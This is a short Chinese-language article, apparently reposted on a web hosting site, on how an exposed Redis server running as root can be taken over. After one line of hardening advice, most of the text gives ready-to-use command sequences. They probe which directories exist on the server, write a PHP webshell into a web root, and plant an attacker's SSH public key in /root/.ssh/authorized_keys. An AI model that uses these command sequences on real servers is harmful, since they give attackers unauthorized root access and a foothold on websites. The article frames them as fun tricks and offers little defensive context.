您好,登錄后才能下訂單哦!
在許多服務器上部署的Redis是采用Root權限進行啟動進而可以利用這個Root做許多超級權限的事情。由于REDIS是沒有嚴格授權管理機制大家在部署一定不要設置為0.0.0.0以及最好使用requirepass(雖然是明文但是至少增加一定的難度)。
本文主要利用的是redis提供的configsave兩個命令來完成我們的HACK功能便捷的工具用歪了就成了禍害。
簡單介紹幾個有用的命令
config set dir $path:
這個命令是配置為了指定redis的“工作路徑”之后生成的RDB和AOF文件都會存儲在這里
dbfilename $name:
RDB文件名默認為“dump.rdb”
save:
將內存里的數據進行持久化操作
它們結合在一起就可以實現如下好玩的功能
1.指定文件夾是否存在
config set dir /home/bob
如果是返回(error) ERR Changing directory: No such file or directory表示沒有該文件夾。
如果返回OK表示服務器上有這個文件夾并且已經將其設置為內存快照保存的文件夾
2.webshell最好使用之前進行flushdb,或者flushall清空內存里數據
1.config set dir /opt/web/www #設定網站的目錄 2.config set dbfilename test.php #設定將要保存的文件名 3.set "<?php phpinfo();?>" "" #我們的webshell 4.save #將內存持久化到test.php
3.訪問信任
1.cat ~/.ssh/id_rsa.pub > ~/foo.txt 2.cat ~/foo.txt|redis -x set hack #將foo.txt里的內容保存為一個KEY為hack的字符串 3.config set dir /root/.ssh/ #設定root的.ssh文件夾 4.config set dbfilename authorized_keys 5.save
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。